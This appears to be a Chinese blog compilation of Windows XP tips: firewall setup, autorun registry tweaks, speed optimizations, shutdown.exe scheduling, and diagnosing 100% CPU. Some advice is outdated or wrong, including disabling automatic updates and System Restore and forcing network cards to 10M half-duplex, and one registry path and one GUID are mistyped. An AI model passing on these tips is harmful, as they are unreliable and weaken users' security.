拉风就好

WinXP SP2防火墙设置

WinXP SP2(以下简称SP2)中的Windows防火墙取代了原来的Internet Connection Firewall（ICF，互联网连接防火墙）。这个改进的防火墙默认设置为开启状态，并且支持IPv4和IPv6两种网络协议，可以为我们的电脑提供更多的安全保护。本文将带领大家来认识Windows防火墙的新特性以及基本设置方法。

一、防火墙新特性

与ICF相比，SP2中的Windows防火墙有了明显的改进。首先是防火墙的运行时间。在以前版本的WinXP中，从网络堆栈开始加载到ICF运行之间还有一段时间的间隔，这意味着在系统启动到防火墙完全运行这一段时间内整个系统是完全暴露的，并没有受到防火墙的保护。这是因为ICF运行所需要的系统服务是在系统引导完成后才开始启动的，而ICF服务还依赖于其他的一些系统服务，那些服务还没有运行的时候ICF的服务自然也就无法运行。在SP2系统中新增了一个名为“引导时策略”（Boot-Time Policy）的比较简单的防护，通过这个防护，我们只能使用到少数必需的网络服务，例如DNS服务器和DHCP服务器的联络等，直到防火墙启动后网络活动才能正常。

新的Windows防火墙不仅默认处于开启状态，而且其配置界面也更加美观。除此之外，Windows防火墙新的特性还包括：本地子网限制；应用到所有连接的通用配置选项；内建IPv6支持；新的组策略配置选项；可通过应用程序的文件名指定特定的通信（原先的ICF只能指定端口，而不能指定程序，现在则可以在允许的通讯中直接选择特定的程序）。

二、安全警报

在SP2中，当用户在本地运行一个应用程序并将其作为Internet服务器提供服务时，Windows防火墙将会弹出一个新的安全警报对话框。通过对话框中的选项可以将此应用程序或服务添加到Windows防火墙的例外项中(即选择“解除阻止此程序”)，Windows防火墙的例外项配置将允许特定的进站连接。当然，也可以通过手工添加程序到例外项中或者添加端口到例外项中，具体的添加方法参见后面的防火墙选项设置。


三、防火墙选项设置

依次单击“开始→控制面板”，然后在控制面板经典视图中双击“Windows防火墙”一项，即可打开Windows防火墙控制台。此外，还可以在SP2新增加的安全中心界面下，点击“Windows防火墙”打开防火墙控制台。

1．常规选项卡

在Windows防火墙控制台“常规”选项卡中有两个主选项：启用（推荐）和关闭（不推荐），一个子选项“不允许例外”。如果选择了不允许例外，Windows防火墙将拦截所有的连接用户计算机的网络请求，包括在例外选项卡列表中的应用程序和系统服务。另外，防火墙也将拦截文件和打印机共享，还有网络设备的侦测。使用不允许例外选项的Windows防火墙简直就完全“闭关”了，比较适用于“高危”环境，如餐馆、宾馆和机场等场所连接到公共网络上的个人计算机。

2．例外选项卡

某些程序需要对外通讯，就可以把它们添加到“例外”选项卡中，这里的程序将被特许可以提供连接服务，即可以监听和接受来自网络上的连接。

在“例外”选项卡界面下方有两个添加按钮，分别是：“添加程序”和“添加端口”，可以根据具体的情况手工添加例外项。如果不清楚某个应用程序是通过哪个端口与外界通信，或者不知道它是基于UDP还是TCP的，可以通过“添加程序”来添加例外项。例如要允许Windows Messenger通信，则点击“添加程序”按钮，选择应用程序“C:\Program Files\Messenger\Messenger\msmsgs.exe”，然后点击“确定”把它加入列表。

如果对端口号以及TCP/UDP比较熟悉，则可以采用后一种方式，即指定端口号的添加方式。对于每一个例外项，可以通过“更改范围”指定其作用域。对于家用和小型办公室应用网络，推荐设置作用域为可能的本地网络。当然，也可以自定义作用域中的IP范围，这样只有来自特定的IP地址范围的网络请求才能被接受.

3．高级选项卡

在“高级”选项卡中包含了网络连接设置、安全记录、ICMP设置和还原默认设置四组选项，可以根据实际情况进行配置。

◆网络连接设置

这里可以选择Windows防火墙应用到哪些连接上，当然也可以对某个连接进行单独的配置，这样可以使防火墙应用更灵活。

◆安全记录

新版Windows防火墙的日志记录与ICF大同小异，日志选项里面的设置可以记录防火墙的跟踪记录，包括丢弃和成功的所有事项。在日志文件选项里，可以更改记录文件存放的位置，还可以手工指定日志文件的大小。系统默认的选项是不记录任何拦截或成功的事项，而记录文件的大小默认为4MB。

◆ICMP设置

Internet控制消息协议（ICMP）允许网络上的计算机共享错误和状态信息。在ICMP设置对话框中选定某一项时，界面下方会显示出相应的描述信息，可以根据需要进行配置。在缺省状态下，所有的ICMP都没有打开。

◆默认设置

如果要将所有Windows防火墙设置恢复为默认状态，可以单击右侧的“还原为默认值”按钮。

四、组策略部署

在ICF中，只能通过网络连接、网络创建向导和Internet连接向导执行启用或关闭ICF，而新版的Windows防火墙则可以通过组策略来控制防火墙状态、允许的例外等设置。

依次单击“开始→运行”，在“运行”对话框中输入“gpedit.msc”，然后点击“确定”即可打开WinXP组策略编辑器。进入组策略编辑器后，就可以用它配置Windows防火墙了。从左侧窗格中依次展开“计算机配置→管理模板→网络→网络连接→Windows Firewall”。在Windows Firewall下可以看到两个分支，一个是域配置文件，一个是标准配置文件。简单的说，当计算机连接到有域控制器的网络中时(即有专门的管理服务器时)，是域配置文件起作用，相反，则是标准配置文件起作用。即使没有配置标准配置文件，缺省的值也会生效。

提示：Windows防火墙的配置和状态信息还可以通过命令行工具Netsh.exe获得，可以在命令提示符窗口下输入“netsh firewall”命令来获取防火墙信息和修改防火墙设定。

从前面的介绍可以看出，SP2中集成的Windows防火墙，在功能上已经接近不少成熟的个人防火墙产品。虽然这个新版的防火墙还欠缺一些第三方厂商的产品所拥有的功能(如输出过滤)，但它对个人用户来说，无疑是一个不错的选择。

如何关闭Windows XP光盘自动播放功能

注册表法

有选择的禁止光盘自动播放

运行注册表编辑器Regedit，展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explroer主键下，在右边窗口中将二进制值“NoDriveTypeAutoRun”的默认键值95 00 00 00，改为B5 00 00 00就可以禁止光盘自动运行功能。

如果要只禁止数据光盘而不禁止音乐CD的自动播放，请把“NoDriveTypeAutoRun”的键值改为BD 00 00 00即可，这样修改后结果其实与采用“组策略”法关闭光盘自动播放效果是一样的。

如果要只禁止音乐CD而不禁止软件光盘的自动播放功能，请打开“资源管理器”，单击“工具”菜单下的“文件夹选项”，在打开的“文件夹选项”窗口中单击“文件类型”标签，然后在该窗口的“文件类型”中找到“音频 CD 播放”（图1），单击“高级”按钮，在打开的窗口中用鼠标指向“操作(A):”中的“Play”（图2），再单击“删除”按钮即可。





部分禁止光盘自动播放

展开注册表到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDRom，在右边窗口中将DWORD值CDRom的键值由默认的1改为0，这样插入光盘后将不再自动播放光盘内容，只有在点击“我的电脑”中的光盘图标时光盘才会自动播放。

工具软件法

我们还可以采用第三方工具软件来禁止光盘自动播放功能，以大家常用的超级兔子魔法设置为例，运行该软件后，单击“硬盘与光驱”，会出现如图所示窗口（图3），将该窗口中“自动运行光盘”和“自动播放音乐CD”前面的“√”取消，就可以去掉光盘的自动运行功能

绝对实用：全面优化Windows XP

Windows XP是Microsoft推出的新一代Windows操作系统，虽然Windows XP称得上是至今功能最强大的操作系统，但与以往的Windows操作系统一样，新安装的Windows XP系统并不是处于最佳的状态，存在着一些用户不必使用和不曾使用的程序。大家可以再利用一些技巧来修改原本设定值来优化Windows XP。下面我们就从几个方面阐述一下Windows XP进行的优化。


一． 启动优化

1、关掉一些伴随着Windows启动的程序及常驻程序。选择"开始"菜单-->"运行"，输入msconfig进入"系统配置应用程序"，在[启动]栏关掉不必要的程序，将方框中的勾勾取消，关掉不必要的程序，不确定的程序不可以乱关，以免造成Windows错误。(先试试是否可以在软件本身取消常驻，不行再用此方法。)，完成后按[应用]，重开机即可。



2、给Windows XP设定一个固定的IP地址。Windows XP虽然进到桌面的速度相当的快，但是运行动作却是一步步来的，你必须要等一段时间才能真的运行程序。如果你的机器装网卡的话，Windows XP会在进入到桌面后会自动搜寻IP地址，所以如果你没有设定一个固定的IP地址的话，它便会浪费许多的时间在搜寻IP地址上面。

3、降低磁盘扫描时间。Windows XP若非正常关机，当再次启动时系统将会自动执行磁盘扫描程序。在开始扫描前将花费10秒钟的等待时间。此时可依次打开“开始→运行”对话框并键入“CMD”，单击“确定”按钮后进入Windows XP的命令提示符模式。在命令提示符后输入“CHKNTFS /T:x”即可（输入时不含引号，x为等待时间），比如输入“CHKNTFS /T:0”，则表示无需等待时间；输入“CHKNTFS /T:3”，则表示等待时间为3秒钟。

4、减少操作系统的等待时间。若安装了多操作系统，那么多操作系统启动菜单中会发现默认的等待时间是30秒。点击“我的电脑”，选择“系统属性”对话框，单击“高级”选项卡，在“启动和故障恢复”区域中单击“设置”按钮，分别勾选设置页面中“显示操作系统列表的时间”和“在需要时显示恢复选项的时间”选项前的复选框，然后将这两项后的时间输入相应的数值以减少等待时间，单击“确定”按钮就可以了。

除了上述四种方法外，我们还可以在注册表中对启动项目进行设定、关闭不必要的系统服务，此外平时经常利用磁盘清理工具、磁盘碎片整理程序也可以在某种程序上提高系统启动速度。

二． 登陆优化

1、缩短关闭"处理程序"时等待时间。选择"开始"菜单-->"运行"，输入regedit，弹出注册表编辑器，寻找[HKEY_CURRENT_USER\ControlPanel\Desktop]，在右边的窗口中选择WaitToKillAppTimeout，按鼠标右键，选择“修改”，将其数值资料改为1000即关闭"处理程序"时等待1秒(默认值为:20000)。



2、缩短"处理程序"出错时等待的时间。选择"开始"菜单-->"运行"，输入regedit弹出注册表编辑器，寻找[HKEY_CURRENT_USER\ControlPanel\Desktop]在右边的窗口中，选择HungAppTimeout，按鼠标右键，选择“修改”，将其数值资料改为200，即"处理程序"出错时等待0.5秒(默认值为:5000)。

3、让系统自动关闭停止响应的程序。选择"开始"菜单-->"运行"，输入regedit，弹出注册表编辑器，寻找[HKEY_CURRENT_USER\ControlPanel\Desktop]，在右边的窗口中选择AutoEndTasks，按鼠标右键，选择“修改”，将其数值资料改为1(默认值为:0)。

4、加快菜单显示速度。选择"开始"菜单-->"运行"，输入regedit，弹出注册表编辑器，寻找[HKEY_CURRENT_USER\ControlPanel\Desktop]，在右边的窗口中选择MenuShowDelay，按鼠标右键，选择“修改”，将其数值资料改为100或更小(默认值为:400)，建议不要使用0，因为如此一来只要鼠标一不小心触碰到"所有程序"，整条菜单就会跑出来，那这乱了套。

5、缩短等待时间。选择"开始"菜单-->"运行"，输入regedit，在弹出的注册表编辑器里寻找[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control]，在右边的窗口中选择WaitToKillServiceTimeout按鼠标右键，选择“修改”，将其数值资料改为1000或更小(原始设定:20000)。

三． 内存优化

Windows XP是一个很出色的操作系统，但它对内存的要求是在是惊人，即使是128兆内存，也会出现系统内存不足导致速度缓慢的问题。在Windows XP中，加入了很多崭新的功能，这些功能可是内存的占用大户，我们只要把这些不常用的功能关闭，那么128兆内存对我们来说已经是绰绰有余了。

1、取消“自动更新”，自动更新提醒用户升级自己的系统，它将常驻内存，所以我们把“自动升级”功能关闭掉，改为“手动升级”。具体操作为：右键单击“我的电脑”，点击属性，点击“自动更新”，在“通知设置”一栏选择“关闭自动更新。

2、取消“系统还原”，XP的系统还原功能对大多数用户来说，没什么太大作用，所以我们决定要关闭它以节约内存。具体操作为：右键单击“我的电脑”，点击属性，会弹出来系统属性对话框，点击“系统还原”，在“在所有驱动器上关闭系统还原”选项上打勾。

3、关闭“远程桌面”，XP的这个功能只是提供网络上互操作。对于普通用户来说这个功能就显得多余了，所以我们把它关掉，不让它在那儿白白浪费内存。

4、关闭“自动发送错误”功能，发送错误给微软，这就是XP中的“自动发送错误”功能，对我们而言出错发送给微软没有任何意义，所以我们应该义无反顾的把这项功能关掉。右键单击“我的电脑”，点击属性，点击“高级”→“错误汇报”，选择“禁用错误汇报”功能。

5、关闭“视觉效果”中不需要的效果，Windows XP的操用界面的确是很好看，好看的背后是以消耗大量内存作为代价的，相对于速度和美观而言，我们还是宁愿选择前者，右键单击“我的电脑”，点击属性，点击“高级”，在“性能”一栏中，点击“设置”，点击“视觉效果”，在这里把所有特殊的外观设置都关闭掉，我们就可以省下“一大笔”内存。

6、关闭“Internet时间同步”功能，“Internet时间同步”，就是使你的计算机时钟每周和Internet时间服务器进行一次同步，这样你的系统时间就会是精确的，不过这个功能对我们来说用处不大，而且还可能引起死机的问题。所以我们要把它关掉。

7、关闭多余的服务，Windows XP和Windows 2000一样可以作为诸如http服务、smtp服务、ftp服务,这些服务为常驻内存，所以每当Windows XP启动时，随之也启动了许多服务，有很多服务对于我们这些普通用户来说是完全没用的，所以关掉它们是一个很好的选择。

四． 硬盘优化

1、使用NTFS的文件系统格式安装。Windows XP NTFS的文件系统相较于FAT32多了文件保密，压缩，使用权限及磁盘配额的管理功能。因此在文件安全及保密性来说较FAT32高。且以NTFS文件系统下安装的操作系统会将不常用的文件压缩起来，所以跟FAT32比起来又节省了相当的空间，因此若是用以FAT32文件系统下安装的操作系统(如Windows98...)就可能无法正确的读取NTFS中的文件。

另外在扇区中愈安装愈多资料的情况下，NTFS在运行的效能上较FAT32文件系统好上许多。因此在这里建议大家使用NTFS文件系统来安装Windows XP系统。

2、把IDE设备设置为DMA传输模式。由于某些原因，Windows XP有时会在IDE通道上使用PIO并行输入输出传输模式，而不是DMA模式。如果有这种情况，用户可以手动把IDE通道改为DMA模式，这样可以减少该设备占用的CPU周期。打开设备管理器(右键点击我的电脑，选属性，点选硬件选项卡，点击“设备管理器”打开)，然后点击展开“IDE ATA/ATAPI 控制器”分支，双击“Primary IDE Channel”，点击高级设置。检查“传输模式”下拉菜单，把它们全部设为DMA If Available(允许情况下使用DMA)，点击确定。再用同样的方式修改每一个IDE控制器



3、删除网页缓存内容 。进入控制面板，双击“Internet选项”进入到"Internet属性”，在[常规]中的“Internet 临时文件”下面点击"删除文件"，并将"删除所有脱机内容"打勾，按下"确定"。



另外在[常规]中还有一个[历史纪录](History)也顺便删一删。删除一些Temp暂存盘:像是“E:\WINDOWS\TEMP"(注：我的XP装在E盘上。)，"E:\DocumentsandSettings\(使用者名称)\LocalSettings\Temp"和一些软件专属的Temp(大部分应该都可以在软件本身中设定)也一起删除。

4、定期的进行磁盘整理。硬盘长期使用，程序软件又安装又删的情况下，会照成扇区中连续的文件破碎，以致硬盘在搜寻资料时，便要花上较多的时间，影响效能。所以定期的做好磁盘整理的工作是绝对有必要的。这次Windows XP在磁盘整理方面较windows98的整理程式有显著的进步，至少不像以前要花上许多的时间，若是使用者嫌Windows本身的整理程序不好，也可以使用Norton的Speeddisk。

五． 网络优化

1、快速浏览局域网络的共享

通常情况下，Windows XP在连接其他计算机时，会全面检查对方机子上所有预定的任务，这个检查会让你等上30秒钟或更多时间。去掉的方法从注册表中找到“HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionExplorerRemoteComputerNameSpace”。

在此键值下，会有个{D6277990-4C6A-11CF-8D87-00AA0060F5BF}键，把它删掉后，重新启动计算机，Windows XP就不再检查预定任务了，速度将明显提高。

2、提高10/100M网卡传输速率

选择“开始→连接到→显示所有连接”，双击网卡所用的连接，单击“属性”按钮，打开“属性”对话框，选择“高级”选项卡。在“属性”栏中选择“Link Speed/Duplex Mode”，紧接着在“设置值”栏中将“Auto Mode”更改为“10 Half Mode”。

这样，手工将10/100M自适应网卡的属性强制为10M半双工模式，使网卡之间不进行自动协商，让网卡之间在传输数据时始终以10Mbps的速度进行，大大提高了网络之间的传输效率。此设置只对部分网卡有效。

3、加速共享

通常情况下，当Windows XP连接到其它计算机时，会检查对方机子上所有预定的任务——这真是多余，而且还会让你等上30秒钟，实在太糟糕了。 首先，在注册表中找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows/Current Version\Explorer\RemoteComputer\NameSpace。在这里面，应该有个 {D6277990-4C6A-11CF-87-00AA0060F5BF}键。只需把它删掉，重新启动计算机后，Windows就不再检查预定任务了，速度明显提高！

4、解决WinXP执行时候停顿一下的问题

开始——网络连接——本地连接，按右键，选择属性，选择“Internet协议(TCP/IP)”，点击属性，使用下面的IP地址：192.168.0.1，子网掩码：255.255.255.0，这样就好了，以后开机就不会停顿了。

通过上面这些简单的设置，相信可以为你提供了更佳的操作环境。希望这能给使用Windows XP的各位朋友，能更加轻松愉快体验Windows XP所带来的乐趣。

WinXP操作系统自动关机的实现

如果你想出门，但电脑又正在进行工作，这时就要用到自动关机。大多数实现自动关机的方法都是使用一些第三方软件，这样不仅麻烦，而且为实现这个小功能而专门动用一个软件，显的小题大做了！其实Windows XP(Windows 2000也可以)自身就具备定时关机的功能，下面我们就来看看如何实现Windows XP的自动关机。



Windows XP的关机是由Shutdown.exe程序来控制的，位于Windows＼System32文件夹中
。如果想让Windows 2000也实现同样的效果，可以把Shutdown.exe复制到系统目录下。

比如你的电脑要在22:00关机，可以选择“开始→运行”，输入“at 22:00 Shutdown -s”，这样，到了22点电脑就会出现“系统关机”对话框，默认有30秒钟的倒计时并提示你保存工作。如果你想以倒计时的方式关机，可以输入“Shutdown.exe -s -t 3600”，这里表示60分钟后自动关机，“3600”代表60分钟。

设置好自动关机后，如果想取消的话，可以在运行中输入“shutdown -a”。另外输入“shutdown -i”，则可以打开设置自动关机对话框，对自动关机进行设置。

Shutdown.exe的参数，每个都具有特定的用途，执行每一个都会产生不同的效果，比如“-s”就表示关闭本地计算机，“-a”表示取消关机操作，下面列出了更多参数，大家可以在Shutdown.exe中按需使用。

-f：强行关闭应用程序

-m ＼＼计算机名：控制远程计算机

-i：显示图形用户界面，但必须是Shutdown的第一个选项

-l：注销当前用户

-r：关机并重启

-t时间：设置关机倒计时

-c "消息内容"：输入关机对话框中的消息内容(不能超127个字符)

使XP系统快上几倍的三招

使Windows XP快上几倍的三招，设置起来非常简单，但是文章又不乏实用性。

　　1、减少开机磁盘扫描等待时间，开始→运行，键入:chkntfs /t:0

　　2、删除系统备份文件：

　　在各种软硬件安装妥当之后，其实XP需要更新文件的时候就很少了。开始→运行，敲入:sfc.exe /purgecache 然后回车即可,近3xxMb。

　　3、压缩文件夹：

　　这是一个相当好的优化，Windows XP内置了对.ZIP文件的，我们可以把zip文件当成文件夹浏览。不过，系统要使用部分资源来实现 这一功能，因此禁用这一功能可以提升系统性能。实现方法非常简单，只需取消zipfldr.dll的注册就可以了，点击开始——运行，敲入: regsvr32 /u zipfldr.dll。然后回车即可。

简析IE不能断点续传的原因

问:我的IE是Windows XP SP2系统自带的，听说这个版本的IE支持断点续传了，但是我在下载一个大文件时，下了一半后单击“取消”后关闭计算机，第二次下载时却从零开始重新下载。这是什么原因？

　　答:IE6.0开始支持断点续传功能了，不过要想使用IE的断点传功能，你必须要满足以下几点:

　　1.关闭IE或是关闭系统时，不能清空Internet临时文件夹，因为IE在下载文件时，会先将下载下来的文件保存到临时文件夹中。对于IE本身来说，你必须确保关闭IE时不自动清理临时文件夹:单击主窗口菜单“工具→Internet选项”，在打开的窗口中选择“高级”选项卡，然后取消选择“关闭浏览器时清空Internet临时文件夹”选项，保存设置。

　　2.在下载时，要想断开当前正在下载的文件，你不要直接单击下载对话框中的“取消”按钮，应该直接单击对话框右上角的关闭按钮。因为，你单击“取消”按钮后就会直接停止所有的下载并且自动清空已经下载到临时文件夹中的文件了。

XP系统环境变量:奇怪现象巧解决

近日，笔者一个朋友的计算机出现了一个奇怪现象:在Windows XP系统的命令行模式中运行所有命令都提示该命令不是内部或外部命令，也不能运行可执行文件和或批处理文件。


　　解决篇:

　　笔者认为是执行这些命令的可执行文件被误删造成的，进入系统安装目录的system32目录中发现ipconfig等可执行文件仍然存在，并没有被删除或改动的迹象。

　　第一步:在目录中直接运行这些可执行文件发现可以调出一个命令执行窗口，不过一闪即逝。由此可断定这些可执行文件没有问题，是完好无损的。

　　第一步:输入“CMD”命令进入命令行模式，然后进入“c:\windows\system32”目录运行ipconfig命令，发现一切正常，IP地址及DNS等信息全部显示出来了。

　　第四步:笔者通过“我的电脑→属性→高级”标签的“环境变量”按钮查看相关信息。发现“系统变量”中的Path项值为空，这应该是问题的关键，由于默认Path为空，所以在任意路径下运行诸如ipconfig的命令系统将无法找到该程序。双击path参数为其设置变量值“c:\windows\system32”。

　　第六步:确定后再在命令行模式中输入“ipconfig”就能显示出正确的信息了。

　　小提示:如果你希望设置多个默认路径可以采用诸如c:\windows\system32;c:\windows的形式，即中间用“;”隔开

WinXP之后安装Win2000

这种方法只可应用于 FAT32 格式的硬盘上。

安装 Windows 2000

1) 用一张 Win98＼Me 启动盘（支持光驱）启动你的电脑。
2) 将 Windows 2000 CD 放入你的光驱中。
3) 在 A: 提示符下输入 X:＼I386＼WINNT.EXE 这里 X: 是你的光驱盘符。
4) 下面开始安装 Windows 2000 到非 Windows XP 的安装分区中。
5) 安装完毕之后，在 Windows 2000 中重启电脑。

修复 Windows XP 引导信息

用你的 Windows XP CD 启动电脑。当到达 Setup or Repair（安装与修复）步骤时，选择修复。在修复控制台中，输入如下内容：

1) FIXBOOT, answer Yes
2) CD
3) ATTRIB -H NTLDR
4) ATTRIB -S NTLDR
5) ATTRIB -R NTLDR
6) ATTRIB -H NTDETECT.COM
7) ATTRIB -S NTDETECT.COM
8) ATTRIB -R NTDETECT.COM
9) COPY X:I386NTLDR C:
10) COPY X:I386NTDETECT.COM C:

X 是光驱的盘符。

让Windows系统从USB启动

利用U盘启动必须具备两个条件。首先主板要支持从USB设备启动，所以需要到BIOS中设置从USB设备启动。进入BOS的“Advanced BIOS Features(高级BIOS特性)”下的“First boot device(第一启动设备)”选项，然后根据需要选择usb-hdd、usb-zip、usb-cdrom等USB设备的启动选项。

　　这里注意：

　　1.U盘启动应选择usb-zip。

　　2.USB移动硬盘启动应选择usb-hdd。

　　3.usb-cdrom启动应选择usb-cdrom。其次USB设备必须支持启动功能。

XP中CPU占用率100原因及解决方法

我们在使用Windows XP操作系统的时候，用着用着系统就变慢了，一看“任务管理器”才发现CPU占用达到100%。这是怎么回事情呢?遇到病毒了，硬件有问题，还是系统设置有问题，在本文中笔者将从硬件，软件和病毒三个方面来讲解系统资源占用率为什么会达到100%。

　　经常出现CPU占用100%的情况，主要问题可能发生在下面的某些方面:

　　CPU占用率高的九种可能

　　1、防杀毒软件造成故障

　　由于新版的KV、金山、瑞星都加入了对网页、插件、邮件的随机监控，无疑增大了系统负担。处理方式:基本上没有合理的处理方式，尽量使用最少的监控服务吧，或者，升级你的硬件配备。

　　2、驱动没有经过认证，造成CPU资源占用100%

　　大量的测试版的驱动在网上泛滥，造成了难以发现的故障原因。 处理方式:尤其是显卡驱动特别要注意，建议使用微软认证的或由官方发布的驱动，并且严格核对型号、版本。

　　3、病毒、木马造成

　　大量的蠕虫病毒在系统内部迅速复制，造成CPU占用资源率据高不下。解决办法:用可靠的杀毒软件彻底清理系统内存和本地硬盘，并且打开系统设置软件，察看有无异常启动的程序。经常性更新升级杀毒软件和防火墙，加强防毒意识，掌握正确的防杀毒知识。

　　4、控制面板—管理工具—服务—RISING REALTIME MONITOR SERVICE点鼠标右键，改为手动。

　　5、开始->；运行->；msconfig->；启动，关闭不必要的启动项，重启。

　　6、查看“svchost”进程。

　　svchost.exe是Windows XP系统的一个核心进程。svchost.exe不单单只出现在Windows XP中，在使用NT内核的Windows系统中都会有svchost.exe的存在。一般在Windows 2000中svchost.exe进程的数目为2个，而在Windows XP中svchost.exe进程的数目就上升到了4个及4个以上。

　　7、查看网络连接。主要是网卡。

　　8、查看网络连接

　　当安装了Windows XP的计算机做服务器的时候，收到端口 445 上的连接请求时，它将分配内存和少量地调配 CPU资源来为这些连接提供服务。当负荷过重的时候，CPU占用率可能过高，这是因为在工作项的数目和响应能力之间存在固有的权衡关系。你要确定合适的 MaxWorkItems 设置以提高系统响应能力。如果设置的值不正确，服务器的响应能力可能会受到影响，或者某个用户独占太多系统资源。

　　要解决此问题，我们可以通过修改注册表来解决:在注册表编辑器中依次展开[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver ]分支，在右侧窗口中新建一个名为“maxworkitems”的DWORD值。然后双击该值，在打开的窗口中键入下列数值并保存退出:

　　如果计算机有512MB以上的内存，键入“1024”；如果计算机内存小于512 MB，键入“256”。

　　9、看看是不是Windows XP使用鼠标右键引起CPU占用100%

　　前不久的报到说在资源管理器里面使用鼠标右键会导致CPU资源100%占用，我们来看看是怎么回事？

　　征兆:

　　在资源管理器里面，当你右键点击一个目录或一个文件，你将有可能出现下面所列问题:

　　任何文件的拷贝操作在那个时间将有可能停止相应

　　网络连接速度将显著性的降低

　　所有的流输入/输出操作例如使用Windows Media Player听音乐将有可能是音乐失真成因:

　　当你在资源管理器里面右键点击一个文件或目录的时候，当快捷菜单显示的时候，CPU占用率将增加到100%，当你关闭快捷菜单的时候才返回正常水平。

解决方法:

　　方法一:关闭“为菜单和工具提示使用过渡效果”

　　1、点击“开始”--“控制面板”

　　2、在“控制面板”里面双击“显示”

　　3、在“显示”属性里面点击“外观”标签页

　　4、在“外观”标签页里面点击“效果”

　　5、在“效果”对话框里面，清除“为菜单和工具提示使用过渡效果”前面的复选框接着点击两次“确定”按钮。

　　方法二:在使用鼠标右键点击文件或目录的时候先使用鼠标左键选择你的目标文件或目录。然后再使用鼠标右键弹出快捷菜单。

CPU占用100%解决办法

　　一般情况下CPU占了100%的话我们的电脑总会慢下来，而很多时候我们是可以通过做一点点的改动就可以解决，而不必问那些大虾了。

　　当机器慢下来的时候，首先我们想到的当然是任务管理器了，看看到底是哪个程序占了较搞的比例，如果是某个大程序那还可以原谅，在关闭该程序后只要CPU正常了那就没问题；如果不是，那你就要看看是什幺程序了，当你查不出这个进程是什幺的时候就去google或者baidu搜。有时只结束是没用的，在xp下我们可以结合msconfig里的启动项，把一些不用的项给关掉。在2000下可以去下个winpatrol来用。

　　一些常用的软件，比如浏览器占用了很搞的CPU，那幺就要升级该软件或者干脆用别的同类软件代替，有时软件和系统会有点不兼容，当然我们可以试下xp系统下给我们的那个兼容项，右键点该.exe文件选兼容性。

　　svchost.exe有时是比较头痛的，当你看到你的某个svchost.exe占用很大CPU时你可以去下个aports或者fport来检查其对应的程序路径，也就是什幺东西在掉用这个svchost.exe，如果不是c:\Windows\system32(xp)或c:\winnt\system32(2000)下的，那就可疑。升级杀毒软件杀毒吧。

　　右击文件导致100%的CPU占用我们也会遇到，有时点右键停顿可能就是这个问题了。官方的解释:先点左键选中，再右键(不是很理解)。非官方:通过在桌面点右键-属性-外观-效果，取消”为菜单和工具提示使用下列过度效果(U)“来解决。还有某些杀毒软件对文件的监控也会有所影响，可以关闭杀毒软件的文件监控；还有就是对网页，插件，邮件的监控也是同样的道理。

　　一些驱动程序有时也可能出现这样的现象，最好是选择微软认证的或者是官方发布的驱动来装，有时可以适当的升级驱动，不过记得最新的不是最好的。

　　CPU降温软件，由于软件在运行时会利用所以的CPU空闲时间来进行降温，但Windows不能分辨普通的CPU占用和降温软件的降温指令之间的区别，因此CPU始终显示100%，这个就不必担心了，不影响正常的系统运行。

　　在处理较大的word文件时由于word的拼写和语法检查会使得CPU累，只要打开word的工具-选项-拼写和语法把”检查拼写和检查语法“勾去掉。

　　单击avi视频文件后CPU占用率高是因为系统要先扫描该文件，并检查文件所有部分，并建立索引；解决办法:右击保存视频文件的文件夹-属性-常规-高级，去掉为了快速搜索，允许索引服务编制该文件夹的索引的勾。

CPU占用100%案例分析

　　1、dllhost进程造成CPU使用率占用100%

　　特征:服务器正常CPU消耗应该在75%以下，而且CPU消耗应该是上下起伏的，出现这种问题的服务器，CPU会突然一直处100%的水平，而且不会下降。查看任务管理器，可以发现是DLLHOST.EXE消耗了所有的CPU空闲时间，管理员在这种情况下，只好重新启动IIS服务，奇怪的是，重新启动IIS服务后一切正常，但可能过了一段时间后，问题又再次出现了。

　　直接原因:

　　有一个或多个ACCESS数据库在多次读写过程中损坏，微软的MDAC系统在写入这个损坏的ACCESS文件时，ASP线程处于BLOCK状态，结果其它线程只能等待，IIS被死锁了，全部的CPU时间都消耗在DLLHOST中。
解决办法:

　　安装“一流信息监控拦截系统”，使用其中的“首席文件检查官IIS健康检查官”软件，

　　启用”查找死锁模块”，设置:

　　--wblock=yes

　　监控的目录，请指定您的主机的文件所在目录:

　　--wblockdir=d:\test

　　监控生成的日志的文件保存位置在安装目录的log目录中，文件名为:logblock.htm

　　停止IIS，再启动“首席文件检查官IIS健康检查官”，再启动IIS，“首席文件检查官IIS健康检查官”会在logblock.htm中记录下最后写入的ACCESS文件的。

　　过了一段时间后，当问题出来时，例如CPU会再次一直处100%的水平，可以停止IIS，检查logblock.htm所记录的最后的十个文件，注意，最有问题的往往是计数器类的ACCESS文件，例如:”**COUNT.MDB”，”**COUNT.ASP”，可以先把最后十个文件或有所怀疑的文件删除到回收站中，再启动IIS，看看问题是否再次出现。我们相信，经过仔细的查找后，您肯定可以找到这个让您操心了一段时间的文件的。

　　找到这个文件后，可以删除它，或下载下来，用ACCESS2000修复它，问题就解决了。

　　2、svchost.exe造成CPU使用率占用100%

　　在win.ini文件中，在[Windows]下面，“run=”和“load=”是可能加载“木马”程序的途径，必须仔细留心它们。一般情况下，它们的等号后面什幺都没有，如果发现后面跟有路径与文件名不是你熟悉的启动文件，你的计算机就可能中上“木马”了。当然你也得看清楚，因为好多“木马”，如“AOL Trojan木马”，它把自身伪装成command.exe文件，如果不注意可能不会发现它不是真正的系统启动文件。

　　在system.ini文件中，在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”，如果不是“explorer.exe”，而是“shell= explorer.exe 程序名”，那幺后面跟着的那个程序就是“木马”程序，就是说你已经中“木马”了。

